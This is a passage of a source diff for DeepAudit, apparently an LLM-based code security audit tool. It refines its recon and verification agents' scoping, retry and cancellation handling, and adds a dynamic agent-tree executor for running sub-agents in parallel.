                "findings": all_findings,
                "steps": self._serialize_steps(),
            }

            # A cancelled run must not be reported as a successful audit.
            if self.is_cancelled and not finished:
                await self.emit_event(
                    "info",
                    f"🛑 ReAct Agent 已取消: {self._iteration} 轮迭代"
                )
                return AgentResult(
                    success=False,
                    error="任务已取消",
                    data=result_data,
                    iterations=self._iteration,
                    tool_calls=self._tool_calls,
                    tokens_used=self._total_tokens,
                    duration_ms=duration_ms,
                )

            await self.emit_event(
                "info",
                f"🎯 ReAct Agent 完成: {len(all_findings)} 个发现, {self._iteration} 轮迭代, {self._tool_calls} 次工具调用"
            )

            return AgentResult(
                success=True,
                data=result_data,
                iterations=self._iteration,
                tool_calls=self._tool_calls,
                tokens_used=self._total_tokens,
                duration_ms=duration_ms,
            )

        except Exception as e:
            logger.error(f"ReAct Agent failed: {e}", exc_info=True)
            return AgentResult(success=False, error=str(e))

    def get_conversation_history(self) -> List[Dict[str, str]]:
        """Return the message list of the current or most recent run."""
        return self._conversation_history

    def get_steps(self) -> List[AgentStep]:
        """Return the steps recorded during the current or most recent run."""
        return self._steps
|
||||
|
|
@ -99,6 +99,12 @@ Final Answer: [JSON 格式的收集结果]
|
|||
4. 运行安全扫描发现初步问题
|
||||
5. 根据发现继续深入
|
||||
|
||||
## 重要提示
|
||||
- 用户可能指定了特定的目标文件进行审计
|
||||
- 如果 list_files 显示"审计范围限定为 X 个指定文件",说明只需要分析这些文件
|
||||
- 在这种情况下,直接读取和分析指定的文件,不要浪费时间遍历其他目录
|
||||
- 如果目录显示为空,可能是因为该目录不包含目标文件
|
||||
|
||||
## 重要原则
|
||||
1. **你是大脑** - 每一步都要思考,不要机械执行
|
||||
2. **动态调整** - 根据发现调整策略
|
||||
|
|
@ -216,13 +222,38 @@ class ReconAgent(BaseAgent):
|
|||
task = input_data.get("task", "")
|
||||
task_context = input_data.get("task_context", "")
|
||||
|
||||
# 🔥 获取目标文件列表
|
||||
target_files = config.get("target_files", [])
|
||||
exclude_patterns = config.get("exclude_patterns", [])
|
||||
|
||||
# 构建初始消息
|
||||
initial_message = f"""请开始收集项目信息。
|
||||
|
||||
## 项目基本信息
|
||||
- 名称: {project_info.get('name', 'unknown')}
|
||||
- 根目录: {project_info.get('root', '.')}
|
||||
- 文件数量: {project_info.get('file_count', 'unknown')}
|
||||
|
||||
## 审计范围
|
||||
"""
|
||||
# 🔥 如果指定了目标文件,明确告知 Agent
|
||||
if target_files:
|
||||
initial_message += f"""⚠️ **重要**: 用户指定了 {len(target_files)} 个目标文件进行审计:
|
||||
"""
|
||||
for tf in target_files[:10]:
|
||||
initial_message += f"- {tf}\n"
|
||||
if len(target_files) > 10:
|
||||
initial_message += f"- ... 还有 {len(target_files) - 10} 个文件\n"
|
||||
initial_message += """
|
||||
请直接读取和分析这些指定的文件,不要浪费时间遍历其他目录。
|
||||
"""
|
||||
else:
|
||||
initial_message += "全项目审计(无特定文件限制)\n"
|
||||
|
||||
if exclude_patterns:
|
||||
initial_message += f"\n排除模式: {', '.join(exclude_patterns[:5])}\n"
|
||||
|
||||
initial_message += f"""
|
||||
## 任务上下文
|
||||
{task_context or task or '进行全面的信息收集,为安全审计做准备。'}
|
||||
|
||||
|
|
@ -239,6 +270,7 @@ class ReconAgent(BaseAgent):
|
|||
|
||||
self._steps = []
|
||||
final_result = None
|
||||
error_message = None # 🔥 跟踪错误信息
|
||||
|
||||
await self.emit_thinking("Recon Agent 启动,LLM 开始自主收集信息...")
|
||||
|
||||
|
|
@ -259,7 +291,7 @@ class ReconAgent(BaseAgent):
|
|||
llm_output, tokens_this_round = await self.stream_llm_call(
|
||||
self._conversation_history,
|
||||
temperature=0.1,
|
||||
max_tokens=2048,
|
||||
max_tokens=4096, # 🔥 增加到 4096,避免截断
|
||||
)
|
||||
except asyncio.CancelledError:
|
||||
logger.info(f"[{self.name}] LLM call cancelled")
|
||||
|
|
@ -270,13 +302,22 @@ class ReconAgent(BaseAgent):
|
|||
# 🔥 Handle empty LLM response to prevent loops
|
||||
if not llm_output or not llm_output.strip():
|
||||
logger.warning(f"[{self.name}] Empty LLM response in iteration {self._iteration}")
|
||||
await self.emit_llm_decision("收到空响应", "LLM 返回内容为空,尝试重试通过提示")
|
||||
empty_retry_count = getattr(self, '_empty_retry_count', 0) + 1
|
||||
self._empty_retry_count = empty_retry_count
|
||||
if empty_retry_count >= 3:
|
||||
logger.error(f"[{self.name}] Too many empty responses, stopping")
|
||||
error_message = "连续收到空响应,停止信息收集"
|
||||
await self.emit_event("error", error_message)
|
||||
break
|
||||
self._conversation_history.append({
|
||||
"role": "user",
|
||||
"content": "Received empty response. Please output your Thought and Action.",
|
||||
})
|
||||
continue
|
||||
|
||||
# 重置空响应计数器
|
||||
self._empty_retry_count = 0
|
||||
|
||||
# 解析 LLM 响应
|
||||
step = self._parse_llm_response(llm_output)
|
||||
self._steps.append(step)
|
||||
|
|
@ -311,6 +352,11 @@ class ReconAgent(BaseAgent):
|
|||
step.action_input or {}
|
||||
)
|
||||
|
||||
# 🔥 工具执行后检查取消状态
|
||||
if self.is_cancelled:
|
||||
logger.info(f"[{self.name}] Cancelled after tool execution")
|
||||
break
|
||||
|
||||
step.observation = observation
|
||||
|
||||
# 🔥 发射 LLM 观察事件
|
||||
|
|
@ -329,9 +375,84 @@ class ReconAgent(BaseAgent):
|
|||
"content": "请继续,选择一个工具执行,或者如果信息收集完成,输出 Final Answer。",
|
||||
})
|
||||
|
||||
# 🔥 如果循环结束但没有 final_result,强制 LLM 总结
|
||||
if not final_result and not self.is_cancelled and not error_message:
|
||||
await self.emit_thinking("📝 信息收集阶段结束,正在生成总结...")
|
||||
|
||||
# 添加强制总结的提示
|
||||
self._conversation_history.append({
|
||||
"role": "user",
|
||||
"content": """信息收集阶段已结束。请立即输出 Final Answer,总结你收集到的所有信息。
|
||||
|
||||
请按以下 JSON 格式输出:
|
||||
```json
|
||||
{
|
||||
"project_structure": {"directories": [...], "key_files": [...]},
|
||||
"tech_stack": {"languages": [...], "frameworks": [...], "databases": [...]},
|
||||
"entry_points": [{"type": "...", "file": "...", "description": "..."}],
|
||||
"high_risk_areas": ["file1.py", "file2.js"],
|
||||
"initial_findings": [{"title": "...", "description": "...", "file_path": "..."}],
|
||||
"summary": "项目总结描述"
|
||||
}
|
||||
```
|
||||
|
||||
Final Answer:""",
|
||||
})
|
||||
|
||||
try:
|
||||
summary_output, _ = await self.stream_llm_call(
|
||||
self._conversation_history,
|
||||
temperature=0.1,
|
||||
max_tokens=2048,
|
||||
)
|
||||
|
||||
if summary_output and summary_output.strip():
|
||||
# 解析总结输出
|
||||
summary_text = summary_output.strip()
|
||||
summary_text = re.sub(r'```json\s*', '', summary_text)
|
||||
summary_text = re.sub(r'```\s*', '', summary_text)
|
||||
final_result = AgentJsonParser.parse(
|
||||
summary_text,
|
||||
default=self._summarize_from_steps()
|
||||
)
|
||||
except Exception as e:
|
||||
logger.warning(f"[{self.name}] Failed to generate summary: {e}")
|
||||
|
||||
# 处理结果
|
||||
duration_ms = int((time.time() - start_time) * 1000)
|
||||
|
||||
# 🔥 如果被取消,返回取消结果
|
||||
if self.is_cancelled:
|
||||
await self.emit_event(
|
||||
"info",
|
||||
f"🛑 Recon Agent 已取消: {self._iteration} 轮迭代"
|
||||
)
|
||||
return AgentResult(
|
||||
success=False,
|
||||
error="任务已取消",
|
||||
data=self._summarize_from_steps(),
|
||||
iterations=self._iteration,
|
||||
tool_calls=self._tool_calls,
|
||||
tokens_used=self._total_tokens,
|
||||
duration_ms=duration_ms,
|
||||
)
|
||||
|
||||
# 🔥 如果有错误,返回失败结果
|
||||
if error_message:
|
||||
await self.emit_event(
|
||||
"error",
|
||||
f"❌ Recon Agent 失败: {error_message}"
|
||||
)
|
||||
return AgentResult(
|
||||
success=False,
|
||||
error=error_message,
|
||||
data=self._summarize_from_steps(),
|
||||
iterations=self._iteration,
|
||||
tool_calls=self._tool_calls,
|
||||
tokens_used=self._total_tokens,
|
||||
duration_ms=duration_ms,
|
||||
)
|
||||
|
||||
# 如果没有最终结果,从历史中汇总
|
||||
if not final_result:
|
||||
final_result = self._summarize_from_steps()
|
||||
|
|
@ -364,7 +485,7 @@ class ReconAgent(BaseAgent):
|
|||
return AgentResult(success=False, error=str(e))
|
||||
|
||||
def _summarize_from_steps(self) -> Dict[str, Any]:
|
||||
"""从步骤中汇总结果"""
|
||||
"""从步骤中汇总结果 - 增强版,从 LLM 思考过程中提取更多信息"""
|
||||
# 默认结果结构
|
||||
result = {
|
||||
"project_structure": {},
|
||||
|
|
@ -377,34 +498,90 @@ class ReconAgent(BaseAgent):
|
|||
"high_risk_areas": [],
|
||||
"dependencies": {},
|
||||
"initial_findings": [],
|
||||
"summary": "", # 🔥 新增:汇总 LLM 的思考
|
||||
}
|
||||
|
||||
# 从步骤的观察结果中提取信息
|
||||
# 🔥 收集所有 LLM 的思考内容
|
||||
thoughts = []
|
||||
|
||||
# 从步骤的观察结果和思考中提取信息
|
||||
for step in self._steps:
|
||||
# 收集思考内容
|
||||
if step.thought:
|
||||
thoughts.append(step.thought)
|
||||
|
||||
if step.observation:
|
||||
# 尝试从观察中识别技术栈等信息
|
||||
obs_lower = step.observation.lower()
|
||||
|
||||
if "package.json" in obs_lower:
|
||||
# 识别语言
|
||||
if "package.json" in obs_lower or ".js" in obs_lower or ".ts" in obs_lower:
|
||||
result["tech_stack"]["languages"].append("JavaScript/TypeScript")
|
||||
if "requirements.txt" in obs_lower or "setup.py" in obs_lower:
|
||||
if "requirements.txt" in obs_lower or "setup.py" in obs_lower or ".py" in obs_lower:
|
||||
result["tech_stack"]["languages"].append("Python")
|
||||
if "go.mod" in obs_lower:
|
||||
if "go.mod" in obs_lower or ".go" in obs_lower:
|
||||
result["tech_stack"]["languages"].append("Go")
|
||||
if "pom.xml" in obs_lower or ".java" in obs_lower:
|
||||
result["tech_stack"]["languages"].append("Java")
|
||||
if ".php" in obs_lower:
|
||||
result["tech_stack"]["languages"].append("PHP")
|
||||
if ".rb" in obs_lower or "gemfile" in obs_lower:
|
||||
result["tech_stack"]["languages"].append("Ruby")
|
||||
|
||||
# 识别框架
|
||||
if "react" in obs_lower:
|
||||
result["tech_stack"]["frameworks"].append("React")
|
||||
if "vue" in obs_lower:
|
||||
result["tech_stack"]["frameworks"].append("Vue")
|
||||
if "angular" in obs_lower:
|
||||
result["tech_stack"]["frameworks"].append("Angular")
|
||||
if "django" in obs_lower:
|
||||
result["tech_stack"]["frameworks"].append("Django")
|
||||
if "flask" in obs_lower:
|
||||
result["tech_stack"]["frameworks"].append("Flask")
|
||||
if "fastapi" in obs_lower:
|
||||
result["tech_stack"]["frameworks"].append("FastAPI")
|
||||
if "express" in obs_lower:
|
||||
result["tech_stack"]["frameworks"].append("Express")
|
||||
if "spring" in obs_lower:
|
||||
result["tech_stack"]["frameworks"].append("Spring")
|
||||
if "streamlit" in obs_lower:
|
||||
result["tech_stack"]["frameworks"].append("Streamlit")
|
||||
|
||||
# 识别数据库
|
||||
if "mysql" in obs_lower or "pymysql" in obs_lower:
|
||||
result["tech_stack"]["databases"].append("MySQL")
|
||||
if "postgres" in obs_lower or "asyncpg" in obs_lower:
|
||||
result["tech_stack"]["databases"].append("PostgreSQL")
|
||||
if "mongodb" in obs_lower or "pymongo" in obs_lower:
|
||||
result["tech_stack"]["databases"].append("MongoDB")
|
||||
if "redis" in obs_lower:
|
||||
result["tech_stack"]["databases"].append("Redis")
|
||||
if "sqlite" in obs_lower:
|
||||
result["tech_stack"]["databases"].append("SQLite")
|
||||
|
||||
# 🔥 识别高风险区域(从观察中提取)
|
||||
risk_keywords = ["api", "auth", "login", "password", "secret", "key", "token",
|
||||
"admin", "upload", "download", "exec", "eval", "sql", "query"]
|
||||
for keyword in risk_keywords:
|
||||
if keyword in obs_lower:
|
||||
# 尝试从观察中提取文件路径
|
||||
import re
|
||||
file_matches = re.findall(r'[\w/]+\.(?:py|js|ts|java|php|go|rb)', step.observation)
|
||||
for file_path in file_matches[:3]: # 限制数量
|
||||
if file_path not in result["high_risk_areas"]:
|
||||
result["high_risk_areas"].append(file_path)
|
||||
|
||||
# 去重
|
||||
result["tech_stack"]["languages"] = list(set(result["tech_stack"]["languages"]))
|
||||
result["tech_stack"]["frameworks"] = list(set(result["tech_stack"]["frameworks"]))
|
||||
result["tech_stack"]["databases"] = list(set(result["tech_stack"]["databases"]))
|
||||
result["high_risk_areas"] = list(set(result["high_risk_areas"]))[:20] # 限制数量
|
||||
|
||||
# 🔥 汇总 LLM 的思考作为 summary
|
||||
if thoughts:
|
||||
# 取最后几个思考作为总结
|
||||
result["summary"] = "\n".join(thoughts[-3:])
|
||||
|
||||
return result
|
||||
|
||||
|
|
|
|||
|
|
@ -334,7 +334,7 @@ class VerificationAgent(BaseAgent):
|
|||
llm_output, tokens_this_round = await self.stream_llm_call(
|
||||
self._conversation_history,
|
||||
temperature=0.1,
|
||||
max_tokens=3000,
|
||||
max_tokens=4096, # 🔥 增加到 4096,避免截断
|
||||
)
|
||||
except asyncio.CancelledError:
|
||||
logger.info(f"[{self.name}] LLM call cancelled")
|
||||
|
|
@ -415,6 +415,22 @@ class VerificationAgent(BaseAgent):
|
|||
# 处理结果
|
||||
duration_ms = int((time.time() - start_time) * 1000)
|
||||
|
||||
# 🔥 如果被取消,返回取消结果
|
||||
if self.is_cancelled:
|
||||
await self.emit_event(
|
||||
"info",
|
||||
f"🛑 Verification Agent 已取消: {self._iteration} 轮迭代"
|
||||
)
|
||||
return AgentResult(
|
||||
success=False,
|
||||
error="任务已取消",
|
||||
data={"findings": findings_to_verify},
|
||||
iterations=self._iteration,
|
||||
tool_calls=self._tool_calls,
|
||||
tokens_used=self._total_tokens,
|
||||
duration_ms=duration_ms,
|
||||
)
|
||||
|
||||
# 处理最终结果
|
||||
verified_findings = []
|
||||
if final_result and "findings" in final_result:
|
||||
|
|
|
|||
|
|
@ -0,0 +1,53 @@
|
|||
"""
|
||||
DeepAudit Agent 核心模块
|
||||
|
||||
包含Agent系统的基础组件:
|
||||
- state: 增强的Agent状态管理
|
||||
- registry: Agent注册表和动态Agent树管理
|
||||
- message: Agent间通信机制
|
||||
- executor: 动态Agent树执行器
|
||||
- persistence: Agent状态持久化
|
||||
"""
|
||||
|
||||
from .state import AgentState, AgentStatus
|
||||
from .registry import AgentRegistry, agent_registry
|
||||
from .message import AgentMessage, MessageType, MessagePriority, MessageBus, message_bus
|
||||
from .executor import (
|
||||
DynamicAgentExecutor,
|
||||
SubAgentExecutor,
|
||||
ExecutionTask,
|
||||
ExecutionResult,
|
||||
ExecutionMode,
|
||||
)
|
||||
from .persistence import (
|
||||
AgentStatePersistence,
|
||||
CheckpointManager,
|
||||
agent_persistence,
|
||||
checkpoint_manager,
|
||||
)
|
||||
|
||||
__all__ = [
|
||||
# State
|
||||
"AgentState",
|
||||
"AgentStatus",
|
||||
# Registry
|
||||
"AgentRegistry",
|
||||
"agent_registry",
|
||||
# Message
|
||||
"AgentMessage",
|
||||
"MessageType",
|
||||
"MessagePriority",
|
||||
"MessageBus",
|
||||
"message_bus",
|
||||
# Executor
|
||||
"DynamicAgentExecutor",
|
||||
"SubAgentExecutor",
|
||||
"ExecutionTask",
|
||||
"ExecutionResult",
|
||||
"ExecutionMode",
|
||||
# Persistence
|
||||
"AgentStatePersistence",
|
||||
"CheckpointManager",
|
||||
"agent_persistence",
|
||||
"checkpoint_manager",
|
||||
]
|
||||
|
|
@ -0,0 +1,491 @@
|
|||
"""
|
||||
动态 Agent 树执行器
|
||||
|
||||
实现完整的动态 Agent 树执行逻辑:
|
||||
- 子 Agent 实际执行
|
||||
- 并行 Agent 执行
|
||||
- 结果汇总
|
||||
- 执行状态追踪
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import logging
|
||||
import time
|
||||
from typing import Dict, Any, List, Optional, Callable, Awaitable
|
||||
from dataclasses import dataclass, field
|
||||
from enum import Enum
|
||||
from datetime import datetime, timezone
|
||||
|
||||
from .state import AgentState, AgentStatus
|
||||
from .registry import agent_registry
|
||||
from .message import message_bus, MessageType
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class ExecutionMode(str, Enum):
    """Scheduling strategy for running a group of agents."""

    # Agents run one after another.
    SEQUENTIAL = "sequential"

    # Agents run concurrently.
    PARALLEL = "parallel"

    # Sequential or parallel is chosen according to the task type.
    ADAPTIVE = "adaptive"
|
||||
|
||||
|
||||
@dataclass
class ExecutionTask:
    """One unit of agent work together with its execution bookkeeping."""

    # ---- What to run ----
    agent_id: str
    agent_type: str
    task: str
    context: Dict[str, Any] = field(default_factory=dict)
    # Larger numbers mean higher priority.
    priority: int = 0
    # IDs of the other tasks this task depends on.
    dependencies: List[str] = field(default_factory=list)

    # ---- Execution state ----
    # One of: pending, running, completed, failed.
    status: str = "pending"
    result: Optional[Dict[str, Any]] = None
    error: Optional[str] = None
    started_at: Optional[datetime] = None
    finished_at: Optional[datetime] = None
|
||||
|
||||
|
||||
@dataclass
class ExecutionResult:
    """Aggregated outcome of running a group of agent tasks."""

    success: bool

    # ---- Agent counters ----
    total_agents: int = 0
    completed_agents: int = 0
    failed_agents: int = 0

    # Findings collected from every agent.
    all_findings: List[Dict[str, Any]] = field(default_factory=list)

    # Raw result of each agent, keyed by agent/task ID.
    agent_results: Dict[str, Dict[str, Any]] = field(default_factory=dict)

    # ---- Execution statistics ----
    total_duration_ms: int = 0
    total_tokens: int = 0
    total_tool_calls: int = 0

    # Error messages gathered along the way.
    errors: List[str] = field(default_factory=list)
|
||||
|
||||
|
||||
class DynamicAgentExecutor:
    """
    Executor for a dynamic tree of agents.

    Responsibilities:
    1. Create and run agents.
    2. Run tasks concurrently while honouring declared dependencies.
    3. Aggregate the results of all tasks.
    4. Turn errors, timeouts and cancellation into result dictionaries.
    """

    def __init__(
        self,
        llm_service,
        tools: Dict[str, Any],
        event_emitter=None,
        max_parallel: int = 5,
        default_timeout: int = 600,
    ):
        """
        Initialise the executor.

        Args:
            llm_service: LLM service passed to every agent that is created.
            tools: Tools passed to every agent that is created.
            event_emitter: Optional event emitter passed to the agents.
            max_parallel: Maximum number of agents running at the same time.
            default_timeout: Timeout, in seconds, applied to each agent run.
        """
        self.llm_service = llm_service
        self.tools = tools
        self.event_emitter = event_emitter
        self.max_parallel = max_parallel
        self.default_timeout = default_timeout

        # Execution state: task bookkeeping by ID, asyncio tasks in flight,
        # and the semaphore that enforces ``max_parallel``.
        self._tasks: Dict[str, "ExecutionTask"] = {}
        self._running_tasks: Dict[str, asyncio.Task] = {}
        self._semaphore = asyncio.Semaphore(max_parallel)

        # Cancellation flag, checked before new work is started.
        self._cancelled = False

    def cancel(self):
        """Set the cancellation flag and cancel every asyncio task still in flight."""
        self._cancelled = True

        # Iterate over a snapshot so the loop is independent of later removals
        # from ``_running_tasks``.
        for task_id, task in list(self._running_tasks.items()):
            if not task.done():
                task.cancel()
                logger.info(f"Cancelled task: {task_id}")

    @property
    def is_cancelled(self) -> bool:
        """Whether :meth:`cancel` has been called."""
        return self._cancelled

    async def execute_agent(
        self,
        agent_class,
        agent_config: Dict[str, Any],
        input_data: Dict[str, Any],
        parent_id: Optional[str] = None,
        knowledge_modules: Optional[List[str]] = None,
    ) -> Dict[str, Any]:
        """
        Instantiate and run a single agent.

        Args:
            agent_class: Agent class to instantiate.
            agent_config: Extra keyword arguments for the agent constructor.
            input_data: Input passed to ``agent.run``.
            parent_id: ID of the parent agent, if any.
            knowledge_modules: Knowledge modules passed to the agent.

        Returns:
            On a finished run, a dict with ``success``, ``data``, ``error``,
            ``agent_id``, ``iterations``, ``tokens_used``, ``tool_calls``,
            ``duration_ms`` and ``handoff``. On timeout, cancellation or any
            other exception, a dict with ``success=False`` and ``error``.
        """
        if self._cancelled:
            return {"success": False, "error": "Execution cancelled"}

        async with self._semaphore:
            # cancel() may have been called while this call was queued behind
            # the semaphore; do not start a new agent in that case.
            if self._cancelled:
                return {"success": False, "error": "Execution cancelled"}

            try:
                agent = agent_class(
                    llm_service=self.llm_service,
                    tools=self.tools,
                    event_emitter=self.event_emitter,
                    parent_id=parent_id,
                    knowledge_modules=knowledge_modules,
                    **agent_config,
                )

                start_time = time.time()
                result = await asyncio.wait_for(
                    agent.run(input_data),
                    timeout=self.default_timeout,
                )
                duration_ms = int((time.time() - start_time) * 1000)

                return {
                    "success": result.success,
                    "data": result.data,
                    "error": result.error,
                    "agent_id": agent.agent_id,
                    "iterations": result.iterations,
                    "tokens_used": result.tokens_used,
                    "tool_calls": result.tool_calls,
                    "duration_ms": duration_ms,
                    "handoff": result.handoff.to_dict() if result.handoff else None,
                }

            except asyncio.TimeoutError:
                logger.error("Agent execution timed out")
                return {"success": False, "error": "Execution timed out"}
            except asyncio.CancelledError:
                # NOTE(review): cancellation is deliberately converted into a
                # result dict here instead of being re-raised.
                logger.info("Agent execution cancelled")
                return {"success": False, "error": "Execution cancelled"}
            except Exception as e:
                logger.error(f"Agent execution failed: {e}", exc_info=True)
                return {"success": False, "error": str(e)}

    async def execute_parallel(
        self,
        tasks: "List[ExecutionTask]",
        agent_factory: "Callable[[ExecutionTask], Awaitable[Dict[str, Any]]]",
    ) -> "ExecutionResult":
        """
        Run several agent tasks and aggregate their results.

        Tasks without dependencies are started together. Tasks with
        dependencies then run one at a time, in an order in which every
        dependency that belongs to this call has already been run. Tasks whose
        dependencies can never be satisfied (for example a dependency cycle)
        are marked as failed instead of being waited on forever.

        Args:
            tasks: Tasks to run.
            agent_factory: Coroutine function that receives a task, runs the
                agent for it and returns the result dict.

        Returns:
            The aggregated execution result; ``success`` is True when no task
            was counted as failed.
        """
        if not tasks:
            return ExecutionResult(success=True)

        start_time = time.time()

        # Higher priority first.
        sorted_tasks = sorted(tasks, key=lambda t: t.priority, reverse=True)
        independent_tasks = [t for t in sorted_tasks if not t.dependencies]
        dependent_tasks = [t for t in sorted_tasks if t.dependencies]

        for task in sorted_tasks:
            self._tasks[task.agent_id] = task

        result = ExecutionResult(
            success=True,
            total_agents=len(tasks),
        )

        if independent_tasks:
            await self._execute_task_batch(independent_tasks, agent_factory, result)

        # Order the dependent tasks so that a task never waits on one that is
        # scheduled after it (which would poll a "pending" status forever).
        runnable, unresolved = self._order_by_dependencies(dependent_tasks)

        for task in runnable:
            if self._cancelled:
                break

            await self._wait_for_dependencies(task)
            await self._execute_single_task(task, agent_factory, result)

        if not self._cancelled:
            for task in unresolved:
                task.status = "failed"
                task.error = f"Unresolvable dependencies: {task.dependencies}"
                task.finished_at = datetime.now(timezone.utc)
                result.failed_agents += 1
                result.errors.append(f"{task.agent_id}: {task.error}")

        result.total_duration_ms = int((time.time() - start_time) * 1000)
        result.success = result.failed_agents == 0

        return result

    @staticmethod
    def _order_by_dependencies(tasks):
        """
        Order tasks so that each one comes after the tasks in ``tasks`` it depends on.

        Dependencies on IDs that are not in ``tasks`` do not constrain the
        order. The incoming order is kept wherever the dependencies allow it.

        Returns:
            ``(ordered, unresolved)``: tasks that can be run in sequence, and
            tasks stuck behind a dependency cycle (including self-dependency).
        """
        remaining = list(tasks)
        blocked_ids = {t.agent_id for t in remaining}
        ordered = []

        progressed = True
        while remaining and progressed:
            progressed = False
            for candidate in list(remaining):
                if any(dep in blocked_ids for dep in candidate.dependencies):
                    continue
                ordered.append(candidate)
                remaining.remove(candidate)
                blocked_ids.discard(candidate.agent_id)
                progressed = True

        return ordered, remaining

    async def _execute_task_batch(
        self,
        tasks: "List[ExecutionTask]",
        agent_factory: "Callable[[ExecutionTask], Awaitable[Dict[str, Any]]]",
        result: "ExecutionResult",
    ):
        """Start every task of the batch as an asyncio task and wait for all of them."""
        async_tasks = []

        for task in tasks:
            if self._cancelled:
                break

            async_task = asyncio.create_task(
                self._execute_single_task(task, agent_factory, result)
            )
            # Registered so that cancel() can reach the task.
            self._running_tasks[task.agent_id] = async_task
            async_tasks.append(async_task)

        if async_tasks:
            # return_exceptions=True: one failing/cancelled task must not
            # abort the wait for the others.
            await asyncio.gather(*async_tasks, return_exceptions=True)

    async def _execute_single_task(
        self,
        task: "ExecutionTask",
        agent_factory: "Callable[[ExecutionTask], Awaitable[Dict[str, Any]]]",
        result: "ExecutionResult",
    ):
        """
        Run one task through ``agent_factory`` and fold its outcome into ``result``.

        The task is counted exactly once, as completed or as failed.
        """
        task.status = "running"
        task.started_at = datetime.now(timezone.utc)

        try:
            agent_result = await agent_factory(task)

            task.finished_at = datetime.now(timezone.utc)
            task.result = agent_result

            if agent_result.get("success"):
                # Extract everything that can fail *before* touching the
                # counters, so a malformed payload cannot be counted as both
                # completed and failed. ``data`` may legitimately be None.
                data = agent_result.get("data")
                findings = data.get("findings") if isinstance(data, dict) else None
                findings = list(findings) if findings else []
                tokens_used = agent_result.get("tokens_used") or 0
                tool_calls = agent_result.get("tool_calls") or 0

                task.status = "completed"
                result.completed_agents += 1
                result.all_findings.extend(findings)
                result.total_tokens += tokens_used
                result.total_tool_calls += tool_calls
            else:
                task.status = "failed"
                task.error = agent_result.get("error")
                result.failed_agents += 1
                result.errors.append(f"{task.agent_id}: {task.error}")

            result.agent_results[task.agent_id] = agent_result

        except asyncio.CancelledError:
            # Do not leave the task in "running" forever; record the
            # cancellation and let it propagate.
            task.status = "failed"
            task.error = "Execution cancelled"
            task.finished_at = datetime.now(timezone.utc)
            result.failed_agents += 1
            result.errors.append(f"{task.agent_id}: {task.error}")
            raise

        except Exception as e:
            task.status = "failed"
            task.error = str(e)
            task.finished_at = datetime.now(timezone.utc)
            result.failed_agents += 1
            result.errors.append(f"{task.agent_id}: {str(e)}")
            logger.error(f"Task {task.agent_id} failed: {e}", exc_info=True)

        finally:
            self._running_tasks.pop(task.agent_id, None)

    async def _wait_for_dependencies(self, task: "ExecutionTask"):
        """
        Poll until every known dependency of ``task`` has left the
        pending/running states, or until the executor is cancelled.

        Dependency IDs that are unknown to this executor are ignored.
        """
        for dep_id in task.dependencies:
            dep_task = self._tasks.get(dep_id)
            if not dep_task:
                continue

            while dep_task.status in ["pending", "running"]:
                if self._cancelled:
                    return
                await asyncio.sleep(0.1)

    def get_execution_summary(self) -> Dict[str, Any]:
        """Return per-status task counts and a per-task status/type/error overview."""
        statuses = [t.status for t in self._tasks.values()]
        return {
            "total_tasks": len(self._tasks),
            "completed": statuses.count("completed"),
            "failed": statuses.count("failed"),
            "pending": statuses.count("pending"),
            "running": statuses.count("running"),
            "tasks": {
                tid: {
                    "status": t.status,
                    "agent_type": t.agent_type,
                    "error": t.error,
                }
                for tid, t in self._tasks.items()
            },
        }
|
||||
|
||||
|
||||
class SubAgentExecutor:
    """
    Sub-agent executor.

    Creates and runs child agents on behalf of a parent agent and keeps the
    result of every child that reported an ``agent_id``.
    """

    def __init__(
        self,
        parent_agent,
        llm_service,
        tools: Dict[str, Any],
        event_emitter=None,
    ):
        """
        Args:
            parent_agent: Agent on whose behalf children are created; its
                ``agent_id`` is used as the children's ``parent_id``.
            llm_service: LLM service passed to the children.
            tools: Tools passed to the children.
            event_emitter: Optional event emitter passed to the children.
        """
        self.parent_agent = parent_agent
        self.llm_service = llm_service
        self.tools = tools
        self.event_emitter = event_emitter

        # Results of finished children, keyed by the child's agent ID.
        self._child_agents: Dict[str, Any] = {}
        self._executor = DynamicAgentExecutor(
            llm_service=llm_service,
            tools=tools,
            event_emitter=event_emitter,
        )

    async def create_and_run_sub_agent(
        self,
        agent_type: str,
        task: str,
        context: Optional[Dict[str, Any]] = None,
        knowledge_modules: Optional[List[str]] = None,
    ) -> Dict[str, Any]:
        """
        Create and run one child agent.

        Args:
            agent_type: Agent type; ``"analysis"`` and ``"verification"`` are
                the types this method can instantiate.
            task: Task description.
            context: Task context; ``project_info`` and ``config`` are read
                from it when present.
            knowledge_modules: Knowledge modules for the child.

        Returns:
            The child's result dict, or a ``success=False`` dict for an
            unknown agent type.
        """
        from ..agents import AnalysisAgent, VerificationAgent

        agent_class_map = {
            "analysis": AnalysisAgent,
            "verification": VerificationAgent,
        }

        agent_class = agent_class_map.get(agent_type)
        if not agent_class:
            return {"success": False, "error": f"Unknown agent type: {agent_type}"}

        ctx = context or {}
        input_data = {
            "task": task,
            "task_context": ctx,
            "project_info": ctx.get("project_info", {}),
            "config": ctx.get("config", {}),
        }

        # Forward the parent's incoming handoff to the child, when there is one.
        if hasattr(self.parent_agent, "_incoming_handoff") and self.parent_agent._incoming_handoff:
            input_data["parent_handoff"] = self.parent_agent._incoming_handoff.to_dict()

        result = await self._executor.execute_agent(
            agent_class=agent_class,
            agent_config={},
            input_data=input_data,
            parent_id=self.parent_agent.agent_id,
            knowledge_modules=knowledge_modules,
        )

        # Only results that carry an agent ID can be recorded.
        if result.get("agent_id"):
            self._child_agents[result["agent_id"]] = result

        return result

    @staticmethod
    def _resolve_knowledge_modules(config: Dict[str, Any]) -> Optional[List[str]]:
        """
        Pick the knowledge modules for one sub-agent config.

        The top-level ``"knowledge_modules"`` key wins; when it is absent the
        value from ``config["context"]["knowledge_modules"]`` is used.
        """
        modules = config.get("knowledge_modules")
        if modules is None:
            modules = (config.get("context") or {}).get("knowledge_modules")
        return modules

    async def run_parallel_sub_agents(
        self,
        sub_agent_configs: List[Dict[str, Any]],
    ) -> "ExecutionResult":
        """
        Run several child agents through the executor.

        Args:
            sub_agent_configs: One dict per child, e.g.
                ``{"agent_type": "analysis", "task": "...", "context": {...},
                "knowledge_modules": [...]}``. Optional keys: ``priority`` and
                ``dependencies``. Task IDs are generated as
                ``sub_<parent agent id>_<index>``, so ``dependencies`` must
                use that form to refer to sibling tasks.

        Returns:
            The aggregated execution result.
        """
        tasks = []
        # ExecutionTask has no knowledge-module field, so keep them on the side.
        modules_by_task: Dict[str, Optional[List[str]]] = {}

